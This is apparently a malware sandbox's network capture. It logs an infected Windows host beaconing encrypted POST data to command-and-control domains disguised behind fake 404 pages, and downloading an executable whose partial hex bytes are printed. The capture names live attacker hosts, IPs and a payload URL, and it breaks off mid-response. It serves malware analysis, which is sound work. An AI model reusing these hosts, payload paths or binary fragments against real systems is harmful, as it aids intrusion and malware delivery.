Jan 9, 2022 18:48:54.961082935 CET	20869	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:54 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	192.168.2.3	49873	148.0.74.229	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:54.753401995 CET	20868	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://iqyfefv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 197 Host: amogohuigotuli.at
Jan 9, 2022 18:48:54.755208015 CET	20869	OUT	Data Raw: 4a 9d 8d c5 4c 64 59 27 59 01 57 56 0f af 22 ba 2c 1b e9 1b f9 1e d7 dc b1 6a a3 80 75 83 a3 95 89 ab 8f c2 7c 44 e1 c5 a3 2e 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a3 19 bf 8a 14 62 cc d6 4f 96 87 bf 18 c0 Data Ascii: JLdY'YWV",ju\|D.jp_S61oJf=B!bOss(\%xO`!w%M-{Vm{-,D^+Tf?,[HS&2nG]oP(uuK
Jan 9, 2022 18:48:55.339545012 CET	20871	IN	HTTP/1.0 404 Not Found Date: Sun, 09 Jan 2022 17:48:55 GMT Server: Apache/2.4.6 (CentOS) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 327 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	192.168.2.3	49874	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:55.203411102 CET	20870	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bycco.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 111 Host: host-data-coin-11.com
Jan 9, 2022 18:48:55.207246065 CET	20870	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 83 66 5d 02 c8 a1 c1 64 14 be d6 21 Data Ascii: i;G~CE5i[nwmFu$f]d!#~-\j`)N*}h
Jan 9, 2022 18:48:55.764686108 CET	20872	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:55 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 32 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 85 4f 13 25 1e e9 e9 df b7 82 16 95 2d ec 0d 0a 30 0d 0a 0d 0a Data Ascii: 22I:82OO%-0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
59	192.168.2.3	49877	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:56.859390974 CET	20986	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://weihpu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 171 Host: host-data-coin-11.com
Jan 9, 2022 18:48:56.859412909 CET	20987	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 80 66 5d 02 c8 a1 c1 64 41 cf b7 3a Data Ascii: i;G~CE5i[nwmFu$f]dA:FI'Y\\|`+BN-Zk3Qyt8t!!BoFt\VTvW5/FRQBVk)w
Jan 9, 2022 18:48:57.407304049 CET	20990	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:57 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 e5 a0 8f 70 bc 57 dd 43 d1 fd 20 82 22 ed c3 90 55 2a e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC "U*c0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49748	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:47:39.488821030 CET	1062	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bmfgfkjf.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 365 Host: host-data-coin-11.com
Jan 9, 2022 18:47:39.488836050 CET	1063	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9f 66 5d 02 c8 a1 c1 64 58 97 ad 31 Data Ascii: i;G~CE5i[nwmFu$f]dX1<\|qSUlMRm~"g:PL:R7cPd5bjQ&}qZq,87"SKojpczSIshEVyV;8Xbj!Y4T
Jan 9, 2022 18:47:40.043361902 CET	1063	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:47:39 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
60	192.168.2.3	49879	148.0.74.229	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:57.016102076 CET	20988	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://amogohuigotuli.at/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 423 Host: amogohuigotuli.at
Jan 9, 2022 18:48:57.016125917 CET	20989	OUT	Data Raw: 4a 9d 8d c5 4c 64 59 27 59 01 57 56 0f af 22 ba 2c 1b e9 1b f9 1e d7 dc b1 6a a3 80 75 83 a3 95 89 ab 8f c2 7c 44 e1 c5 a3 2e 6a 34 cc c4 b9 41 dd 0f 7e 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 81 9a c6 a4 19 ba 8a 14 62 cd d6 4f 96 e0 c1 3c d9 Data Ascii: JLdY'YWV",ju\|D.j4A~;}f=BbO<p&QD{jB+"m]B4JEBP5XN1mx,jz{;v6h6?^A<^jsQ#;\%n11Hca~
Jan 9, 2022 18:48:57.609491110 CET	20991	IN	HTTP/1.0 404 Not Found Date: Sun, 09 Jan 2022 17:48:57 GMT Server: Apache/2.4.6 (CentOS) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 327 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
61	192.168.2.3	49880	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:57.955610991 CET	20991	OUT	GET /files/9993_1641737702_2517.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: data-host-coin-8.com
Jan 9, 2022 18:48:58.496680975 CET	20993	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:58 GMT Content-Type: application/x-msdos-program Content-Length: 590848 Connection: close Last-Modified: Sun, 09 Jan 2022 14:15:02 GMT ETag: "90400-5d526d88d6301" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5e 60 89 17 1a 01 e7 44 1a 01 e7 44 1a 01 e7 44 04 53 63 44 33 01 e7 44 04 53 72 44 07 01 e7 44 04 53 64 44 66 01 e7 44 3d c7 9c 44 1f 01 e7 44 1a 01 e6 44 92 01 e7 44 04 53 6d 44 1b 01 e7 44 04 53 73 44 1b 01 e7 44 04 53 76 44 1b 01 e7 44 52 69 63 68 1a 01 e7 44 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 6c 5f 9e 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 ec 00 00 00 d4 7b 02 00 00 00 00 9f 1c 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 ab a3 09 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 84 07 00 3c 00 00 00 00 50 7b 02 f8 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 7c 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 09 ea 00 00 00 10 00 00 00 ec 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 8d 06 00 00 00 01 00 00 8e 06 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 ba 73 02 00 90 07 00 00 86 00 00 00 7e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 fe 00 00 00 50 7b 02 00 00 01 00 00 04 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 51 56 33 f6 83 3d 0c 25 bb 02 03 75 0b 56 56 56 56 56 ff 15 40 00 41 00 89 75 fc 8b 45 10 89 45 fc 8b 45 0c 31 45 fc 8b 45 fc 8b 4d 08 89 01 5e c9 c2 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$^`DDDScD3DSrDDSdDfD=DDDDSmDDSsDDSvDDRichDPELl_`{@P\|<P{\|@.text `.rdata@@.datas~@.rsrcP{@@UQV3=%uVVVVV@AuEEE1EEM^
Jan 9, 2022 18:48:58.496738911 CET	20994	IN	Data Raw: 0c 00 81 00 03 35 ef c6 c3 55 8b ec 83 ec 4c 8b 45 08 53 8b 58 04 56 8b 30 57 33 ff 81 3d 0c 25 bb 02 ee 00 00 00 89 75 ec 75 17 57 ff 15 84 00 41 00 ff 15 90 00 41 00 57 57 57 57 ff 15 80 00 41 00 a1 a8 a3 47 00 89 45 dc a1 ac a3 47 00 89 45 d8 Data Ascii: 5ULESXV0W3=%uuWAAWWWWAGEGEE}Ey7GEEGEE EE=%EuEPWEPW<AEE%=u%@.=u=$HE0EE1MEM3E
Jan 9, 2022 18:48:58.496772051 CET	20996	IN	Data Raw: 02 00 00 59 83 66 14 00 33 c0 c7 46 18 07 00 00 00 66 89 46 04 c3 cc cc cc cc cc cc cc cc cc cc cc ba 10 90 47 00 e9 41 08 00 00 ba 10 90 47 00 e9 bc 07 00 00 8b ff 55 8b ec 83 ec 20 53 33 db 39 5d 0c 75 1d e8 ef 19 00 00 53 53 53 53 53 c7 00 16 Data Ascii: Yf3FfFGAGU S39]uSSSSSwME;tVEEEPSuEPEEBsMxEEPSYY^[UEV3;usVVVVV3@^]UQeVE
Jan 9, 2022 18:48:58.496803045 CET	20997	IN	Data Raw: c9 d9 f5 9b df e0 9e 7a f8 dd d9 d9 fe eb cd e8 1f 43 00 00 eb 1b a9 ff ff 0f 00 75 f2 83 7c 24 08 00 75 eb dd d8 db 2d 90 96 47 00 b8 01 00 00 00 83 3d 00 19 48 00 00 0f 85 67 43 00 00 ba 1e 00 00 00 8d 0d 00 90 47 00 e8 60 44 00 00 5a c3 8b ff Data Ascii: zCu\|$u-G=HgCG`DZU=,Hus)u'h%YY]jXhGV"3uEPAj_}MZf9@u8<@@PEu'f9@ut@v39@Mu3CS#Yuj
Jan 9, 2022 18:48:58.496870995 CET	20998	IN	Data Raw: 8b ec 51 56 8b 75 0c 56 e8 4f 39 00 00 89 45 0c 8b 46 0c 59 a8 82 75 17 e8 a8 0f 00 00 c7 00 09 00 00 00 83 4e 0c 20 83 c8 ff e9 2f 01 00 00 a8 40 74 0d e8 8d 0f 00 00 c7 00 22 00 00 00 eb e3 53 33 db a8 01 74 16 89 5e 04 a8 10 0f 84 87 00 00 00 Data Ascii: QVuVO9EFYuN /@t"S3t^NFFF^]u,2 ;t2@;uubPYuVPYFWF>HN+I;N~WPuOEM FyMtt
Jan 9, 2022 18:48:58.496942043 CET	21000	IN	Data Raw: 08 00 00 80 fa 49 74 55 80 fa 68 74 44 80 fa 6c 74 18 80 fa 77 0f 85 63 08 00 00 81 8d f0 fd ff ff 00 08 00 00 e9 54 08 00 00 80 3b 6c 75 16 43 81 8d f0 fd ff ff 00 10 00 00 89 9d c4 fd ff ff e9 39 08 00 00 83 8d f0 fd ff ff 10 e9 2d 08 00 00 83 Data Ascii: ItUhtDltwcT;luC9- !<6u{4uCC<3u{2uCC<d<i<o<u<x<XPPWY
Jan 9, 2022 18:48:58.497009993 CET	21001	IN	Data Raw: 83 e8 03 0f 85 b6 01 00 00 c7 85 b8 fd ff ff 27 00 00 00 f6 85 f0 fd ff ff 80 c7 85 e0 fd ff ff 10 00 00 00 0f 84 69 fe ff ff 8a 85 b8 fd ff ff 04 51 c6 85 d4 fd ff ff 30 88 85 d5 fd ff ff c7 85 d0 fd ff ff 02 00 00 00 e9 45 fe ff ff f7 c1 00 10 Data Ascii: 'iQ0EK t@tGGG@t3@t;\|;su3}9~u
Jan 9, 2022 18:48:58.497070074 CET	21002	IN	Data Raw: 47 00 5d c3 05 44 ff ff ff 6a 0e 59 3b c8 1b c0 23 c1 83 c0 08 5d c3 e8 7d 1f 00 00 85 c0 75 06 b8 d0 91 47 00 c3 83 c0 08 c3 e8 6a 1f 00 00 85 c0 75 06 b8 d4 91 47 00 c3 83 c0 0c c3 8b ff 55 8b ec 56 e8 e2 ff ff ff 8b 4d 08 51 89 08 e8 82 ff ff Data Ascii: G]DjY;#]}uGjuGUVMQY0^]jhGM3;v.jX3;E@uWWWWW3Mu;u3F3]wi=JuKuE;Jw7jY}uYEE
Jan 9, 2022 18:48:58.497108936 CET	21004	IN	Data Raw: 09 18 eb 29 80 7d 0f 00 75 10 8d 4a e0 bb 00 00 00 80 d3 eb 8b 4d 08 09 59 04 8d 4a e0 ba 00 00 00 80 d3 ea 8d 84 b8 c4 00 00 00 09 10 8b 45 fc 89 06 89 44 30 fc 8b 45 f0 ff 08 0f 85 f3 00 00 00 a1 88 15 48 00 85 c0 0f 84 d8 00 00 00 8b 0d b0 4a Data Ascii: )}uJMYJED0EHJ5Ah@HSQJHPH@JH@HCHHyCu`HxueSjpHpj5HAJHkJ
Jan 9, 2022 18:48:58.497168064 CET	21005	IN	Data Raw: fc 89 75 10 c1 fe 04 4e 83 fe 3f 76 03 6a 3f 5e 8b 4d f4 8d 0c f1 8b 79 04 89 4b 08 89 7b 04 89 59 04 8b 4b 04 89 59 08 8b 4b 04 3b 4b 08 75 57 8a 4c 06 04 88 4d 0f fe c1 88 4c 06 04 83 fe 20 73 1c 80 7d 0f 00 75 0e 8b ce bf 00 00 00 80 d3 ef 8b Data Ascii: uN?vj?^MyK{YKYK;KuWLML s}uM9DD }uNMyNED3@_^[UJMkJMSI VW}M3UJS;#U#
Jan 9, 2022 18:48:58.678096056 CET	21007	IN	Data Raw: 8b 45 f0 8b 48 08 8b d7 e8 75 44 00 00 ba fe ff ff ff 39 53 0c 0f 84 52 ff ff ff 68 20 9d 47 00 57 8b cb e8 8d 44 00 00 e9 1c ff ff ff 8b ff 55 8b ec 33 c0 39 45 08 6a 00 0f 94 c0 68 00 10 00 00 50 ff 15 c8 00 41 00 a3 8c 15 48 00 85 c0 75 02 5d Data Ascii: EHuD9SRh GWDU39EjhPAHu]3@J]UWWAuA`wt_]Uu5Gnh]UhAAthAPdAtu]UuYu

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
62	192.168.2.3	49882	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:49:02.450225115 CET	21654	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://iffgi.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 120 Host: host-data-coin-11.com
Jan 9, 2022 18:49:02.450244904 CET	21655	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 84 de 80 66 5d 02 c9 a1 c1 64 5c d0 dd 01 Data Ascii: i;G~CE5i[nwmFu$f]d\zdw%h{FI\|$dV\~}/w
Jan 9, 2022 18:49:03.006741047 CET	22297	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:49:02 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 